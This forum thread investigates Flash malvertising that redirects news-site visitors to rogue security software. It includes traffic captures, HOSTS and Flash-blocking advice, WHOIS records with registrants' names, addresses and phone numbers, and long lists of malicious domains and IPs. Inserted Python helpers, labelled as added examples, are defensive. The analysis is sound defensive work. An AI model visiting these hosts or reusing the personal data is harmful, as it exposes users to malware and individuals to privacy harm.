Full Version: Flash Mystery
B.I.S.S. Forums > Malware News , Research & Removal > Malware Playground
Kimberly
Recently many people got redirected to rogue products such as ErrorSafe, Malware-Scan, PerformanceOptimizer, or Erreur Chasseur for French people, as they are geolocation based. I got myself hit by such advertisements in my Virtual Machine while surfing on legitimate and serious websites.

References to read


Content of http://www.bluetack.co.uk/forums/index.php?showtopic=18044

Malicious advertisements and advertising fraud.
http://msmvps.com/blogs/spywaresucks/archi...08/1386804.aspx

Il mistero (svelato) della redirezione su ToolSicuro
http://www.suspectfile.com/wblog/?p=41

Translated version of ToolSicuro using Google:
http://translate.google.com/translate?u=ht...en&ie=UTF-8

Rogue ads pushing malware -- how it works
http://sunbeltblog.blogspot.com/2007/11/ro...d-networks.html

Mike On Ads - ErrorSafe
http://www.mikeonads.com/what-is-errorsafe...-do-we-stop-it/

The article from SuspectFile explains the mechanism very well so there isn't much to add. Most people in the spyware community got intrigued, myself included. Below is a small summary of the investigation I started yesterday, but the main purpose of this article will be:

Can I protect myself from these adverts?

Ready for a flashy ride? Ok let's take off ...

Unless you know what you're doing or have a VM handy, don't play with this please.

Step 1 - Getting infected again


Since I know where I got the malicious swf file, it didn't take much time to get infected again. I was simply reading the news on a French website. So fasten your seat belts and let's surf over there again but this time with Ethereal running since we must trace the connections. Take off to Le Nouvel Observateur. Since adverts are rotating, it might take a couple of minutes to get the swf file, so let’s follow a few links on the main page. It took only a few mouse clicks to obtain the desired result. In the middle of reading a chapter, my Internet Browser sort of “vanished” and PerformanceOptimizer was all there was left on my desktop.

IPB Image
Clicking Ok or Cancel doesn't really matter ...
BTW, nice imitation of My Computer ... those guys are really inventive.

IPB Image
Back, Next, Cancel .... your choice. All roads lead to Rome.

IPB Image
Let's move on to the next part.

Step 2 - Tracking the advert


This part is time consuming as it does involve quite some reading. The firewall log may help to narrow things down – in other words, to spot the link that is responsible for the infection.
I knew I had to search for newbieadguide(dot)com and performanceoptimizer(dot)com, but that wasn’t enough to understand everything.
The Ethereal log shows an interesting detail called Referer.

CODE
Frame 9319 (477 bytes on wire, 477 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: newbieadguide.com (217.150.254.40)
Transmission Control Protocol, Src Port: 2105 (2105), Dst Port: http (80), Seq: 1, Ack: 1, Len: 423
Hypertext Transfer Protocol
    GET /statsa.php?u=23423424&campaign=c0pperin HTTP/1.1\r\n
    Accept: */*\r\n
    Accept-Language: en-US\r\n
    Referer: http://uniprix.nouvelobs.com/RealMedia/ads/Creatives/OasDefault/NO_TEXBOOKX_MBAN_1107//textbookx_728x90.swf?
clickTag=http://uniprix.nouvelob\r\n
    x-flash-version: 9,0,115,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: newbieadguide.com\r\n
    Connection: Keep-Alive\r\n
    \r\n

Looks like we have found our culprit.
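The detail that gives the game away in the frame above is the combination of headers: the Referer is a Flash creative hosted on the publisher's ad server, the request carries an x-flash-version header, and the Host is an unrelated third party. The following is an added example (not code from the original post) that parses a captured HTTP request in the form Ethereal displays it and flags exactly that pattern. The sample request is constructed after the frame shown above, with the redacted header line left out; the function and variable names are my own.

```python
"""Flag a Flash creative calling out to a third-party host.

Added example, not from the original post. Parses an HTTP request as
captured on the wire (CRLF-terminated headers) and reports the pattern
described in the thread: Referer is a .swf on the publisher's ad server,
x-flash-version is present, Host is outside the publisher's domain.
"""
from urllib.parse import urlsplit

# Constructed sample modelled on the captured frame above (redacted header dropped).
SAMPLE_REQUEST = (
    "GET /statsa.php?u=23423424&campaign=c0pperin HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-US\r\n"
    "Referer: http://uniprix.nouvelobs.com/RealMedia/ads/Creatives/OasDefault/"
    "NO_TEXBOOKX_MBAN_1107//textbookx_728x90.swf?clickTag=http://uniprix.nouvelob\r\n"
    "x-flash-version: 9,0,115,0\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: newbieadguide.com\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)


def parse_request(raw):
    """Return (method, path, headers); header names are lower-cased."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def registrable(host):
    """Crude eTLD+1 (last two labels); adequate for .com/.net style hosts."""
    return ".".join(host.lower().split(".")[-2:])


def flash_third_party_call(raw):
    """Describe the request if it matches the pattern, otherwise return None."""
    method, path, headers = parse_request(raw)
    referer = headers.get("referer")
    if not referer or "x-flash-version" not in headers:
        return None
    ref = urlsplit(referer)
    if not ref.path.lower().endswith(".swf"):
        return None
    host = headers.get("host", "")
    if registrable(host) == registrable(ref.hostname or ""):
        return None  # same site: the publisher's own ad server tracking itself
    return {
        "creative": ref.path.rsplit("/", 1)[-1],
        "publisher": registrable(ref.hostname),
        "third_party": host,
        "request": f"{method} {path}",
        "flash_version": headers["x-flash-version"],
    }


if __name__ == "__main__":
    print(flash_third_party_call(SAMPLE_REQUEST))
```

Run over a whole capture, one request at a time, this turns the manual reading of the Ethereal log into a filter: only requests where a .swf on one site triggers a hit on another site are reported, and the creative's file name comes out with them, which is what you need to hand to the webmaster.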

Step 3 - Trying to assemble the puzzle


File: textbookx_728x90.swf shows 100% clean at Virustotal.

Below are 2 screenshots of the swf file showing a part of its code using 2 different programs.

It has some encrypted? obfuscated? action scripts in it, way beyond my skills to decode that. Looks like SWF Encrypt was used to obfuscate the code.
You’ll find some details on its content and how it triggers in the write-up made by SuspectFile.

IPB Image

IPB Image
See the mention Protected & Encrypted.
IPB Image
Next “links in the chain” are the following web sites taken from the firewall log:

CODE
12/11/2007 4:15:39 AM,http://newbieadguide.com/swf/gnida.swf?campaign=c0pperin&u=23423424
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsg.php?u=23423424&campaign=c0pperin
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsa.php?u=23423424&campaign=c0pperin

Note: Read up from bottom to top for chronological order.
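Reading a firewall log bottom-up by hand works for three lines, but not for a busy session. The following is an added example (not code from the original post) that parses log lines in the format shown above, puts them in chronological order, and pulls out the campaign and affiliate parameters that tie the hits together into one redirect chain. The sample lines are constructed after the entries above; the format string and function names are my assumptions.

```python
"""Rebuild a redirect chain from firewall log lines.

Added example, not from the original post. Assumes the log format shown
above: "M/D/YYYY H:MM:SS AM,URL", newest entry first.
"""
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed sample after the three log entries above.
SAMPLE_LOG = """\
12/11/2007 4:15:39 AM,http://newbieadguide.com/swf/gnida.swf?campaign=c0pperin&u=23423424
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsg.php?u=23423424&campaign=c0pperin
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsa.php?u=23423424&campaign=c0pperin
"""


def parse_log(text):
    """Yield (timestamp, url) pairs; lines that do not parse are skipped."""
    for line in text.splitlines():
        stamp, sep, url = line.partition(",")
        if not sep:
            continue
        try:
            ts = datetime.strptime(stamp.strip(), "%m/%d/%Y %I:%M:%S %p")
        except ValueError:
            continue
        yield ts, url.strip()


def chain(text):
    """Return the hits oldest-first with host, path and the linking parameters.

    The log is newest-first and only has one-second resolution, so the list is
    reversed first and then sorted stably: entries within the same second keep
    the order the firewall wrote them in."""
    entries = list(parse_log(text))
    entries.reverse()
    entries.sort(key=lambda e: e[0])
    steps = []
    for ts, url in entries:
        u = urlsplit(url)
        q = parse_qs(u.query)
        steps.append({
            "time": ts.strftime("%H:%M:%S"),
            "host": u.hostname,
            "path": u.path,
            "campaign": q.get("campaign", [None])[0],
            "u": q.get("u", [None])[0],
        })
    return steps


def consistent_campaign(steps):
    """True when every step carries the same campaign and affiliate id, i.e.
    the hits belong to one chain rather than to unrelated traffic."""
    return len({(s["campaign"], s["u"]) for s in steps}) == 1


if __name__ == "__main__":
    for s in chain(SAMPLE_LOG):
        print(s["time"], s["host"], s["path"], s["campaign"], s["u"])
```

The campaign and affiliate values (`c0pperin`, `23423424`) are what make the chain traceable: once they are known you can grep the rest of the log for the same pair and find the hits that came before statsa.php, such as the creative itself.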

I will not detail those elements; I only post them for historical purposes. If you really feel bored, you can always take a peek at the code of the php pages.

newbieadguide.com/statsa.php
[attachment]

newbieadguide.com/statsg.php
[attachment]

"Chameleon" in gnida.swf (Refered by SuspectFile).
IPB Image

Action script from gnida.swf
[attachment]

Tools used


Flash Decompiler Trillix
http://www.decompiler-swf.com

Sothink SWF Decompiler
http://www.sothink.com/product/flashdecompiler/

Flare
http://www.nowrap.de/flare.html

SWF Encrypt™ 4.0
http://www.amayeta.com/

Ethereal
http://www.ethereal.com
Kimberly
Can I protect myself from these adverts?

Hundreds of domains are “serving” this crap. So what's the miracle solution? I’m sorry, I can’t offer the perfect way of handling this. I can simply suggest a few measures.

The HOSTS file


You won’t get redirected to any of the sites included in the file. Thus by adding newbieadguide.com and all the other "known" domains, you will still be able to see the initial flash advert but you won't get redirected to the rogue site.
The con of this approach is the "unknown" domains. New domains are probably ready to serve the same redirects, and before they are spotted, many innocent people will be hit over and over again. But it does help a little bit.
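To make the strength and the weakness of the HOSTS approach concrete, here is an added example (not code from the original post) that builds the entries for a block list without duplicating names already in the file, and then checks which URLs the resulting file would actually stop. The domains are the ones named in this thread; the "unknown" domain and the subdomain in the check are constructed placeholders standing for a redirector the list does not know yet.

```python
"""HOSTS block list: build entries, then check what they catch.

Added example, not from the original post. Uses 0.0.0.0 as the sink address
so the entries cannot be confused with the localhost line.
"""
from urllib.parse import urlsplit

# Domains named in the thread as part of the redirect chain.
KNOWN_DOMAINS = ["newbieadguide.com", "performanceoptimizer.com"]

SINK = "0.0.0.0"


def hosts_entries(domains, existing="", sink=SINK):
    """Return the lines to append to a HOSTS file.

    Both the bare domain and its www. form are mapped to the sink; names that
    `existing` (the current file content) already lists are skipped, and
    comments / blank lines in `existing` are ignored."""
    present = set()
    for line in existing.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            present.update(name.lower() for name in line.split()[1:])
    out = []
    for d in domains:
        for name in (d.lower(), "www." + d.lower()):
            if name not in present:
                out.append(f"{sink} {name}")
                present.add(name)
    return out


def blocked_names(hosts_text, sink=SINK):
    """Set of hostnames the HOSTS file maps to the sink address."""
    names = set()
    for line in hosts_text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2 and parts[0] == sink:
            names.update(p.lower() for p in parts[1:])
    return names


def would_block(url, hosts_text):
    """True if the URL's host is sunk by the HOSTS file.

    HOSTS matches exact names only: an unlisted subdomain or a brand-new
    domain passes straight through, which is the weakness described above."""
    host = (urlsplit(url).hostname or "").lower()
    return host in blocked_names(hosts_text)


if __name__ == "__main__":
    current = "127.0.0.1 localhost\n"
    print("\n".join(hosts_entries(KNOWN_DOMAINS, current)))
```

Because matching is exact, the list has to be maintained domain by domain, including the www. form, and any new redirector domain stays open until someone adds it; that is why the HOSTS file is a supplement to, not a replacement for, blocking Flash itself.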

Firewall


If you have a firewall with ad blocking capabilities, activate them. Most of them block banners if they meet some conditions based upon size, keywords, etc … It isn’t perfect but it surely helps.

IPB Image

IPB Image

Manage Add-ons in Internet Explorer


Open up Internet Explorer and select Tools > Manage Add-ons.
Depending on your Internet Explorer version, the options might vary a bit. Either look under Add-ons currently loaded in Internet Explorer or under Add-ons that have been used by Internet Explorer. IE7 has an additional option too.

Select the Shockwave Flash Object and set its status to disabled. Ok the boxes and restart Internet Explorer as required.
IPB Image
Internet Explorer add-ons: frequently asked questions
http://windowshelp.microsoft.com/Windows/e...df9b7e1033.mspx

How to Configure Enhanced Security Features for Internet Explorer from Windows XP SP2
http://www.microsoft.com/technet/security/...xp/iesecxp.mspx

How to manage Internet Explorer add-ons in Windows XP Service Pack 2
http://support.microsoft.com/kb/883256

NoScript for Firefox


Install NoScript for Firefox if not yet done.
Right click the icon in the status bar and select Options.

IPB Image
Put a checkmark next to Forbid Macromedia Flash. I would recommend checking Apply these restrictions to trusted sites too. If you only have a few trusted sites then you might leave that unchecked. Everything depends on your other settings.

IPB Image
More information can be found at the Noscript website

While you are installing plugins and securing Firefox, you might also add AdblockPlus on your ToDo list.

Setting the "killbit" for Flash


If you don’t want to mess around with the Internet Explorer Add-ons or Noscript, you can always set the killbit for Shockwave.

You can perform this task in various ways:

Of course with the last 3 methods you won’t be able to see Flash animations no matter what webpage you visit. But that’s a very small price to stay protected imo.

Uninstall Flash


How to uninstall the Adobe Flash Player plug-in and ActiveX control

Other Flash related links:

Now it's up to you all. Happy surf.
Kimberly
On 17 December I received a positive response from the Nouvel Observateur, the banner was removed from the website.

Several banners are still active and present on the internet, so webmasters, take your responsibilities and take them down please. If in doubt, get them analysed and contribute to keeping the internet clean & safe.
Kimberly
As mentioned above, people are redirected based upon their geo location. The list below reflects the main domains and their "associated" IPs / domains. The redirects I did stumble on during tests are listed in red (main domains not included).
The list is still a work in progress and I'll keep it updated as much as possible.

Main domains


newbieadguide.com - 217.150.254.40

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag
Dedicated Hosting: newbieadguide.com is hosted on a dedicated server.

Record last updated on 24-Apr-2007.
Record expires on 20-Apr-2008.
Record created on 20-Apr-2007.

Domain servers in listed order:
NS2.NEWBIEADGUIDE.COM 190.15.73.252
NS1.NEWBIEADGUIDE.COM 190.15.73.251
______________________________

vozemiliogaranon.com - 217.150.254.41

Server Type: Apache
IP Location - Switzerland - Pc Ions Incorporation

Domain Name : vozemiliogaranon.com

::Registrant::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Administrative Contact::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Technical Contact::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Name Servers::
ns1.vozemiliogaranon.com
ns2.vozemiliogaranon.com
ns3.vozemiliogaranon.com
ns4.vozemiliogaranon.com

::Dates & Status::
Created Date 2007-11-23 04:58:49 EST
Updated Date 2007-11-23 04:58:49 EST
Valid Date 2008-11-23 04:58:49 EST
Status ACTIVE
______________________________

thetechnorati.com - 217.150.254.44

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-07
Domain Name : thetechnorati.com

::Registrant::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Administrative Contact::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Technical Contact::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Name Servers::
ns1.thetechnorati.com
ns2.thetechnorati.com
ns3.thetechnorati.com
ns4.thetechnorati.com

::Dates & Status::
Created Date 2007-11-23 05:13:25 EST
Updated Date 2007-11-23 05:13:25 EST
Valid Date 2008-11-23 05:13:25 EST
Status ACTIVE
______________________________

akamahi.net - 217.150.254.45

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-23
Domain Name : akamahi.net

::Registrant::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Administrative Contact::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Technical Contact::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Name Servers::
ns1.akamahi.net
ns2.akamahi.net
ns3.akamahi.net
ns4.akamahi.net

::Dates & Status::
Created Date 2007-11-23 05:18:08 EST
Updated Date 2007-11-23 05:18:08 EST
Valid Date 2008-11-23 05:18:08 EST
Status ACTIVE
______________________________

adtraff.com - 84.243.252.84

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: adtraff.com is hosted on a dedicated server.

Record last updated on 02-Nov-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.

Domain servers in listed order:
NS1.ADTRAFF.COM 190.15.73.251
NS2.ADTRAFF.COM 190.15.73.252
______________________________

burnads.com - 84.243.252.85

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: burnads.com is hosted on a dedicated server.

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-11
Domain Name : burnads.com

::Registrant::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Administrative Contact::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Technical Contact::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Name Servers::
ns1.burnads.com
ns2.burnads.com

::Dates & Status::
Created Date 2006-06-29 05:33:08 EDT
Updated Date 2007-06-27 17:54:41 EDT
Valid Date 2008-06-29 05:33:08 EDT
Status ACTIVE
______________________________

mysurvey4u.com - uniqads.com - traffalo.com - traveltray.com - 190.15.73.254

Server Type: lighttpd/1.4.13
IP Location - Francisco Morazan - Tegucigalpa - Secure Hosting Ltd
Reverse IP: 107 other sites hosted on this server.


mysurvey4u.com

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-14
Domain Name : mysurvey4u.com

::Registrant::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Administrative Contact::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Technical Contact::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Name Servers::
ns1.mysurvey4u.com
ns2.mysurvey4u.com

::Dates & Status::
Created Date 2006-12-04 09:57:28 EST
Updated Date 2007-12-03 20:06:35 EST
Valid Date 2008-12-04 09:57:28 EST
Status ACTIVE


uniqads.com

Record last updated on 08-Jun-2007.
Record expires on 27-Apr-2008.
Record created on 27-Apr-2007.

Domain servers in listed order:
NS2.UNIQADS.COM 190.15.73.252
NS1.UNIQADS.COM 190.15.73.251


traffalo.com

Record last updated on 26-Apr-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.

Domain servers in listed order:
NS1.TRAFFALO.COM 190.15.73.251
NS2.TRAFFALO.COM 190.15.73.252


traveltray.com

Record last updated on 02-Jun-2007.
Record expires on 01-Jul-2008.
Record created on 01-Jul-2004.

Domain servers in listed order:
NS1.TRAVELTRAY.COM 190.15.73.251
NS2.TRAVELTRAY.COM 190.15.73.252

Closest Relationships


newbieadguide.com

domains sharing mailservers
  • ad2cash.net
  • adtraff.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • deuscleanerpay.com
  • errordigger.com
  • errorinspector.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • netmediagroup.net
  • netturbopro.com
  • opensols.com
  • popupnukerpro.com
  • sellmoresoft.net
  • sellmysoft.net
  • traffalo.com
  • unicsearch.com
  • uniqads.com
  • windefender.com
  • zappinads.com
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • mysurvey4u.com
  • netmediagroup.net
  • netturbopro.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • traveltray.com
  • unicsearch.com
  • uniqads.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
subdomains
  • mail.newbieadguide.com
  • ns1.newbieadguide.com
  • ns2.newbieadguide.com
  • www.newbieadguide.com
______________________________

vozemiliogaranon.com

domains sharing nameservers
  • advancedcleaner.com
  • akamahi.net
  • antispywaresuite.com
  • antiviruspcsuite.com
  • bestsellerantivirus.com
  • diskretter.com
  • elmejorantivirus.com
  • erreurchasseur.com
  • exterminadordevirus.com
  • moncontenuassistant.com
  • schijfbewaker.com
  • securepccleaner.com
  • spyguardpro.com
  • storageprotector.com
  • systemdoctor.com
  • thetechnorati.com
  • toolsicuro.com
subdomains
  • ns1.vozemiliogaranon.com
  • ns2.vozemiliogaranon.com
  • ns3.vozemiliogaranon.com
  • ns4.vozemiliogaranon.com
______________________________

thetechnorati.com

domains sharing nameservers
  • advancedcleaner.com
  • antispywaresuite.com
  • antiviruspcsuite.com
  • bestsellerantivirus.com
  • diskretter.com
  • elmejorantivirus.com
  • erreurchasseur.com
  • exterminadordevirus.com
  • moncontenuassistant.com
  • schijfbewaker.com
  • securepccleaner.com
  • spyguardpro.com
  • storageprotector.com
  • systemdoctor.com
  • toolsicuro.com
  • vozemiliogaranon.com
subdomains
  • ns1.thetechnorati.com
  • ns2.thetechnorati.com
  • ns3.thetechnorati.com
  • ns4.thetechnorati.com
______________________________

akamahi.net

domains sharing nameservers
  • advancedcleaner.com
  • antispywaresuite.com
  • antiviruspcsuite.com
  • bestsellerantivirus.com
  • diskretter.com
  • elmejorantivirus.com
  • erreurchasseur.com
  • exterminadordevirus.com
  • moncontenuassistant.com
  • schijfbewaker.com
  • securepccleaner.com
  • spyguardpro.com
  • storageprotector.com
  • systemdoctor.com
  • thetechnorati.com
  • toolsicuro.com
  • vozemiliogaranon.com
subdomains
  • ns1.akamahi.net
  • ns2.akamahi.net
  • ns3.akamahi.net
  • ns4.akamahi.net
______________________________

mysurvey4u.com

hostnames sharing ip with a-records
  • ns1.1downlinebuilder.info
  • ns2.1downlinebuilder.info
domains sharing mailservers
  • advancedcleaner.com
  • boysmag.net
  • crazycinema.net
  • gaychoice.net
  • globalsoftcash.net
  • iseekporn.net
  • traveltray.com
  • videosexygirls.net
  • viragehosting.com
domains using this as nameserver
  • 1downlinebuilder.info
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • traveltray.com
  • unicsearch.com
  • uniqads.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
______________________________

traveltray.com

hostnames sharing ip with a-records
  • ns2.1easy-breezy.info
domains sharing mailservers
  • advancedcleaner.com
  • boysmag.net
  • crazycinema.net
  • gaychoice.net
  • globalsoftcash.net
  • iseekporn.net
  • mysurvey4u.com
  • videosexygirls.net
  • viragehosting.com
domains using this as nameserver
  • 1easy-breezy.info
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • mysurvey4u.com
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • unicsearch.com
  • uniqads.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
______________________________

uniqads.com - traffalo.com - burnads.com

domains sharing mailservers
  • ad2cash.net
  • adtraff.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • deuscleanerpay.com
  • errordigger.com
  • errorinspector.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • opensols.com
  • popupnukerpro.com
  • sellmoresoft.net
  • sellmysoft.net
  • traffalo.com
  • unicsearch.com
  • windefender.com
  • zappinads.com
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • mysurvey4u.com
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • traveltray.com
  • unicsearch.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
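The "sharing nameservers" relationships above are what let you group hundreds of throwaway domains into a handful of operators: two domains on the same name servers are almost certainly run by the same people, and the relation is transitive. The following is an added example (not code from the original post) that turns a subset of those records into clusters with a union-find structure. The relationship data is a constructed Python subset of what is listed above; feeding it the complete lists needs no code change.

```python
"""Cluster domains by shared name servers (union-find).

Added example, not from the original post. SHARED_NS is a constructed subset
of the "domains sharing nameservers" records listed above; the clustering is a
plain disjoint-set union, so the two infrastructure groups visible in the
thread fall out without any hand-written rules.
"""

# domain -> domains reported as sharing its name servers (subset of the page).
SHARED_NS = {
    "newbieadguide.com": ["adtraff.com", "burnads.com", "mysurvey4u.com",
                          "traffalo.com", "traveltray.com", "uniqads.com"],
    "mysurvey4u.com": ["newbieadguide.com", "traffalo.com", "traveltray.com"],
    "vozemiliogaranon.com": ["akamahi.net", "thetechnorati.com",
                             "erreurchasseur.com", "toolsicuro.com"],
    "thetechnorati.com": ["vozemiliogaranon.com", "akamahi.net"],
}


class DisjointSet:
    """Union-find with path halving; elements are created on first use."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def clusters(relations):
    """Return the connected groups as sorted lists, ordered by first member."""
    ds = DisjointSet()
    for dom, peers in relations.items():
        for p in peers:
            ds.union(dom.lower(), p.lower())
    groups = {}
    for d in list(ds.parent):
        groups.setdefault(ds.find(d), set()).add(d)
    return sorted((sorted(g) for g in groups.values()), key=lambda g: g[0])


def same_infrastructure(a, b, relations):
    """True if a and b end up in the same name-server cluster."""
    a, b = a.lower(), b.lower()
    return any(a in g and b in g for g in clusters(relations))


if __name__ == "__main__":
    for group in clusters(SHARED_NS):
        print(len(group), "domains:", ", ".join(group))
```

With the subset above this yields two groups: the ad-network side (newbieadguide.com, adtraff.com, uniqads.com, traffalo.com, ...) and the rogue-product side (vozemiliogaranon.com, thetechnorati.com, akamahi.net, erreurchasseur.com, toolsicuro.com). A new domain only has to be checked against the name servers it uses to be placed in the right group, which is how a block list can get ahead of the "unknown" domains rather than chasing them one at a time.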

190.15.73.254

  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adhokuspokus.com
  6. Adnetserver.com
  7. Adredired.com
  8. Adsolutio.com
  9. Adverdaemon.com
  10. Adverlounge.com
  11. Adzyclon.com
  12. Antivirussecuritypro.com
  13. Astalaprofit.com
  14. B2adz.com
  15. Bestadmedia.com
  16. Bestpharmacydeals.com
  17. Bestsearchnet.com
  18. Bestshopz.com
  19. Bestwnvmovies.com
  20. Bizadverts.com
  21. Bizmarketads.com
  22. Blessedads.com
  23. Brandmarketads.com
  24. Bucksinsoft.com
  25. Cancerno.com
  26. Cashloanprofit.com
  27. Casinoaceking.com
  28. Casinodealsgalore.com
  29. Cheap-auto-deals.com
  30. Co-search.com
  31. Deuscleanerpay.com
  32. Easybestdeals.com
  33. Eroticabsolute.com
  34. Fantazybill.com
  35. Favouriteshop.com
  36. Fileprotector.com
  37. Freepcsecure.com
  38. Freetvnow.net
  39. Friedads.com
  40. Getfreecar.com
  41. Glorymarkets.com
  42. Great4mac.com
  43. Greyhathosting.com
  44. Hebooks-service.com
  45. Iddqdmarketing.com
  46. Infyte.com
  47. Installprovider.com
  48. Internetadaultfriend.com
  49. Intervarioclick.com
  50. Invulnerableads.com
  51. Keywordcpv.com
  52. Libresystm.com
  53. Luckyadcoin.com
  54. Luckyadsols.com
  55. Magicsearcher.com
  56. Manage-search.com
  57. Marketingdungeon.com
  58. Mediatornado.com
  59. Megashopcity.com
  60. Mightyfaq.com
  61. Misc-search.com
  62. Mobilesoftmarketing.com
  63. Moneycometrue.com
  64. Moneypalacecash.com
  65. Myfavouritesearch.com
  66. Myhealth-life.org
  67. Myonlinefinance.com
  68. Mysurvey4u.com
  69. Mythmarketing.com
  70. Mytravelgeek.com
